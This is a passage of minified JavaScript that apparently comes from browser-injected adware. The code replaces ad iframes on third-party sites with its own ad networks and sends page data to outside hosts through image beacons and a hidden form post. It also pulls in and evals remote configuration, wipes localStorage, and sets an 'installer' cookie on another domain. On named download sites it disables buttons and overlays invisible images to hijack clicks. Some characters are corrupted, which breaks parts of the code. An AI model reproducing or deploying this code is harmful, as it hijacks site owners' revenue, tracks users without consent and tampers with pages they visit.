_zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting [bleep] gangbang orgy gay nude tits tranny blowjob handjob masturbat busty [bleep] joder horny mamada polla [bleep] pussy threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function(b){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function(b){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s9637099427355148866\"))continue}catch©{try{if(d[i].getAttribute(\"s9637099427355148866\"))continue}catch(e){}};try{if(d[i].src.indexOf('=287611')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s9637099427355148866\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a,b){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a,b)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&&b){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d](b);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'epBZXbCZ=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s9637099427355148866\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;if(window.self.location.hostname.indexOf('outube.com')>-1 || size=='120x60' ) {return false;};return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size=+size+&referrer=' (atp?atp:1), [354,size]);}}catch(e){return !1;}},saymedia_epom:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"300x250\":\"8f6c66f3e05b3a00ea333796ce58e746\",\"728x90\":\"efa8d59ee068a8f4b6cf7c164e4dcde6\",\"160x600\":\"44ed683e7a7c3907cfcf80681d957f40\",\"468x60\":\"b361cb101b536c70d25330a3aa18ac4b\"}[size];var surl='http://n66.adshostnet.com/ads?key='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1351,size]);}}catch(e){return !1;}},startmeapp_tier1_1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2695492&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]&pubclick=[INSERT_CLICK_TAG]', (atp?atp:1), [1404,size]);}}catch(e){return !1;}},ybrant_apn3785:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size==\"120x60\")return;var rfr=window.self==window.top?encodeURIComponent(window.self.location.href):'';var arr={\"728x90\":\"2\",\"300x250\":\"1\",\"468x60\":\"3\",\"120x600\":\"5\",\"160x600\":\"4\"}[size];var surl='http://ads.incmd03.com/creative/2-002136823-00001i;size='+arr+';tag_id=3785;ref='+rfr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1013,size]);}}catch(e){return !1;}},matomy_adj36:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2689668&size=+size+' (atp?atp:1), [1503,size]);}}catch(e){return !1;}},clove_adr4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"160x600\":\"2691476\",\"300x250\":\"2691477\",\"728x90\":\"2691478\"}[size];var surl='http://ads.clovenetwork.com/tt?id='+ arr  + '&pubclick=[INSERT_CLICK_TAG]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1534,size]);}}catch(e){return !1;}},adsiduous_D:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2709909\",\"300x250\":\"2709908\",\"160x600\":\"2709907\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '&referrer=[REFERRER_URL]';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1524,size]);}}catch(e){return !1;}},dsnr_dasa_e1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt?id=2464304&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [1038,size]);}}catch(e){return !1;}},dsnr_nntbr_e1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt?id=2464078&size='+size+'&referrer=[REFERRER_URL]', (atp?atp:1), [1042,size]);}}catch(e){return !1;}},cpx_youtube:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://servedby.adsplats.com/tt?id=2476283&size=+size+&referrer=${REFERER_URL}' (atp?atp:1), [943,size]);}}catch(e){return !1;}},matomy_strm36:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2690013&size=+size+' (atp?atp:1), [1496,size]);}}catch(e){return !1;}},mari_strm_4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;arr={\"728x90\":\"2705062\",\"300x250\":\"2705064\",\"160x600\":\"2705065\"}[size];var surl='http://ib.adnxs.com/tt?id='+ arr  + '';return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [1448,size]);}}catch(e){return !1;}},web3_strm_D:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2703401&size='+size+'&cb=[CACHEBUSTER]&referrer=[REFERRER_URL]', (atp?atp:1), [1548,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();if(!document.getElementById(\"sad32ecs3fdsa\")&&1==Math.ceil(4*Math.random()))try{setTimeout(function(){var b=document.getElementsByTagName(\"body\")[0],a=document.createElement(\"div\");a.setAttribute(\"style\",\"width:728px;height:90px;margin:0 auto\");a.setAttribute(\"id\",\"sad32ecs3fdsa\");a.innerHTML='<iframe src=\"//ads.ventivmedia.com/www/delivery/afr.php?zoneid=31&cb='+Math.random()+'\" style=\"width:728px;height:90px\" frameborder=\"0\" scrolling=\"no\"></iframe>';b.insertBefore(a,b.firstChild)},1)}catch(e){};;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();})()}else{(function(){var stngs = {attr_name:'s1470661514',szy_domain:[\"senddownloadmy.com\",\"superstoragemy.org\"],ad_sizes:[[728,90,1],[300,250,2],[468,60,3],[250,250,4],[160,600,5],[120,600,6],[120,240,7],[240,400,8],[300,600,10]],checkif:function(ifr){return (ifr.getAttribute('s1470661514') || ifr.src.indexOf('=287611')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};window.adzy653rk={nrnm:5,ifr:[],src:[],jbs:{ifr:[],at:[]},imp:{pid:\"34\",eid:\"15\",hid:\"0\",lt:\"562.46\",referrer:document.referrer,hostname:window.self.location.hostname,url:window.self.location.hostname,jpshort:\"epBZXbCZ\",rattr:stngs.attr_name,title:document.title,domain:stngs.szy_domain,sizes:stngs.ad_sizes},getKeywords:function(){var a=adzy653rk.imp.title,c=document.getElementsByTagName(\"meta\");if©for(var b=0,d=c.length;b<d;b++)\"keywords\"==c.name.toLowerCase()&&(a+=\" \"+c.content.replace(/,/g,\" \"));return a.replace(/[_-]/g,\" \")},init:function(){var a=document.getElementsByTagName(\"iframe\");if(a.length){for(var c=[],b=0;b<a.length;b++)stngs.checkif(a)||(a.setAttribute(adzy653rk.imp.rattr,\"true\"),a.setAttribute(\"replaced\",\"true\"),c.push(a));if(c.length){var d=function(a){if(a>=c.length){var b=adzy653rk.imp;adzy653rk.jbs.at.length?adzy653rk.getAds(\"//\"+adzy653rk.imp.domain[\"https:\"==window.self.location.protocol?1:0]+\n\"/?tid=1&size=\"+adzy653rk.jbs.at.join(\",\")+\"&subid=\"+b.pid+\"&subid1=\"+b.hid+\"&subid2=\"+b.eid+\"&lt=\"+b.lt+\"&k=\"+encodeURIComponent(adzy653rk.getKeywords()),\"seta\"):adzy653rk.destruct()}else{if(b=adzy653rk.getAt(c[a]))adzy653rk.jbs.ifr.push(c[a]),adzy653rk.jbs.at.push(b);setTimeout(function(){d(++a)},1)}};d(0)}else adzy653rk.destruct()}else adzy653rk.destruct()},dfn:function(a){if(adzy653rk.ifr.length&&(a=a?a:1,!(300<a))){var c=function(b){b>=adzy653rk.ifr.length?setTimeout(function(){adzy653rk.dfn(++a)},\n1200):(adzy653rk.src&&adzy653rk.ifr&&adzy653rk.ifr.src!=adzy653rk.src[0]&&(adzy653rk.ifr.nextSibling.innerHTML&&adzy653rk.ifr.nextSibling.innerHTML.match(/<span[^>]?>Ads( not)? by/i)?(new Image).src=\"http://zig.installerdatauk.info/?aid=2&bid=1&hid=0&eid=15&pid=34&cid=0&c=\"+encodeURIComponent(adzy653rk.ifr.src):((new Image).src=\"http://zig.installerdatauk.info/?aid=1&bid=1&hid=0&eid=15&pid=34&cid=0&c=\"+\nencodeURIComponent(adzy653rk.ifr.src),adzy653rk.ifrset(adzy653rk.ifr,adzy653rk.src[1],1))),setTimeout(function(){c(++b)},1))};c(0)}},destruct:function(a){adzy653rk.jbs={ifr:[],at:[]};adzy653rk.rnm?adzy653rk.rnm++:(adzy653rk.rnm=1,setTimeout(adzy653rk.dfn,1200));adzy653rk.rnm<=adzy653rk.nrnm&&setTimeout(adzy653rk.init,1200)},getAt:function(a){a=[parseInt(\"number\"==typeof a.width||\"string\"==typeof a.width&&a.width.match(/[0-9]/)?a.width:a.scrollWidth),parseInt(\"number\"==typeof a.height||\"string\"==\ntypeof a.height&&a.height.match(/[0-9]/)?a.height:a.scrollHeight)];for(var c=adzy653rk.imp.sizes,b=0;b<c.length;b++)if(a[0]>=c[0]-5&&a[0]<=c[0]+5&&a[1]>=c[1]-5&&a[1]<=c[1]+5)return c[2];return!1},getAds:function(a,c){if(-1<navigator.userAgent.indexOf(\"MSIE\")){var b=document.createElement(\"script\");b.type=\"text/javascript\";b.src=a+\"&cb=adzy653rk.\"+c;b.onreadystatechange=b.onload=function(){try{b.parentNode.removeChild(b)}catch(a){}};try{window.adzy653rk=adzy653rk,(document.getElementsByTagName(\"head\")[0]||\ndocument.getElementsByTagName(\"body\")[0]).appendChild(b)}catch(d){}}else{var e=new XMLHttpRequest;e.open(\"GET\",a,!0);e.onreadystatechange=function(){if(4==e.readyState)adzy653rk[c](e.response)};e.send(null)}},seta:function(a){var c=null;try{var b=adzy653rk.l.decode(a);\"undefined\"!=typeof JSON&&JSON.parse?c=JSON.parse(b):eval(\"ifrl = \"+b)}catch(d){}if(c&&c.length)for(a=0;a<c.length;a++)c[a]&&adzy653rk.jbs.ifr[a]&&adzy653rk.ifrset(adzy653rk.jbs.ifr[a],c[a]);adzy653rk.destruct()},ifrset:function(a,c,\nb){b||(adzy653rk.ifr.push(a),c[0]=c[0].replace(/\\[##([^#]+)##\\]/g,function(a,b){return adzy653rk.imp[toekn]?adzy653rk.imp[toekn]:\"\"}));var d=[\"<html><head><style>html,body{width:100%;height:100%;margin:0}</style></head><body>\",\"</body></html>\"];switch(c[1]){case 1:a.src=c[0]+(-1<c[0].indexOf(\"?\")?\"&\"+adzy653rk.imp.jpshort+\"=\"+c[2]+\"_18x18_0\":\"\");break;case 2:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+'<iframe src=\"'+c[0]+'\" style=\"width:100%;height:100%;border:0;\" scrolling=\"no\" frameborder=\"0\"></iframe>'+\nd[1])}catch(e){}break;case 3:case 6:a.src=\"about:blank\";try{a.contentWindow.document.write(d[0]+c[0]+d[1])}catch(f){}}b||adzy653rk.src.push([a.src,c])},l:{xlat:\"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/\",decode:function(a){a=a.toString().replace(/[^A-Za-z0-9\\+\\/]/g,\"\");for(var c=\"\",b=0;b<a.length;){var d=this.xlat.indexOf(a.charAt(b++)),e=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),g=this.xlat.indexOf(a.charAt(b++)),h=(e&15)<<4|f>>2,k=(f&3)<<6|g,c=c+\nString.fromCharCode(d<<2|e>>4);64!=f&&0<h&&(c+=String.fromCharCode(h));64!=g&&0<k&&(c+=String.fromCharCode(k))}return this._utf8_decode©},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt(b);if(128>d)c+=String.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ads.mangomediaads.com optimizedby.brealtime.com n66.adshostnet.com ad.z5x.net ads.qadserve.com ad.yieldmanager.com adservingstd.com ad.adserverplus.com servedby.adxplosions.com srv.aileronx.com servedby.adsplats.com ad.reachjunction.com srv1.statisticsreporting.com ads.deliads.com advs.adgorithms.com ads.ad-maven.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com an.z5x.net ads.clovenetwork.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com ads.networkhm.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=287611\")==-1 &&adzy653rk.location.indexOf(\"zoneid=458516\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"epBZXbCZ=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"epBZXbCZ=\")){var d=a.match(/epBZXbCZ=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd9FqihEAen0rHnMDMlGC7VLBT99tMtGB6DHhfs0rShNAen0rchOAen0rHwFqHs4rdr7pa==\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){if(document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e') && document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild){document.getElementById('_ad4d917f2e764fab63b916b5e0655d2e').firstElementChild.onclick=function(){return false}};if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var a=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),b=document.createElement(\"div\");b.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';a.style.position=\"relative\";a.appendChild(b)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(a=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),b=document.createElement(\"div\"),b.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),b.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',a.style.position=\"relative\",a.appendChild(b))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var d=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var a=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+a.top+\"px;left:\"+a.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(b){}},c=document.createElement(\"script\");c.type=\"text/javascript\";c[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+d.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild©}if(-1<window.self.location.hostname.indexOf(\"irpy.co\")&&window.self==window.top)try{d=function(){try{$(\".download-maxiget, .download-trinity\").attr(\"href\",\"#\"),$(\"#mp3-with-trinity\").remove()}catch(a){}},-1<!navigator.userAgent.indexOf(\"chrome\")?d():(c=document.createElement(\"script\"),c.innerHTML=\"(\"+d.toString()+\")()\",document.body.appendChild©)}catch(e){}if('GB'!='US'&&-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")){var d=document.createElement(\"img\");d.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\");d.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\";var a=document.getElementById(\"r1113566095\").parentNode;a.style.position=\"relative\";a.appendChild(d)};})();if(window.self.location.hostname.indexOf('hesefiles.c')>-1) window.self.location.href='about:blank';if(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\")()\";document.body.appendChild(s)}};if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")};if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"};if (-1<document.location.host.indexOf(\"bookbrowsee.ne\")) {new function(){for(var c=[\"adv.php?\",\"/adv.php?\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.pathname+a.search,b=0;b<c.length;b++)c==e.substr(0,c.length)&&\"nofollow\"==a.rel&&\"_blank\"==a.target&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(a){a.returnValue=!1;a.preventDefault&&a.preventDefault()},!1))}};if(-1<document.location.host.indexOf(\"irrorcreator.co\")){for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};if(-1<document.location.host.indexOf(\"loud-vibe.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3seal.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"p3vampire.co\")){var a=document.getElementById(\"continue\");a.setAttribute(\"onclick\",\"return false\");a.setAttribute(\"href\",\"\");a.addEventListener(\"click\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1);a.addEventListener(\"mousedown\",function(b){b.returnValue=!1;b.preventDefault&&b.preventDefault()},!1)};if(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0];b.parentNode.style.position=\"relative\";var 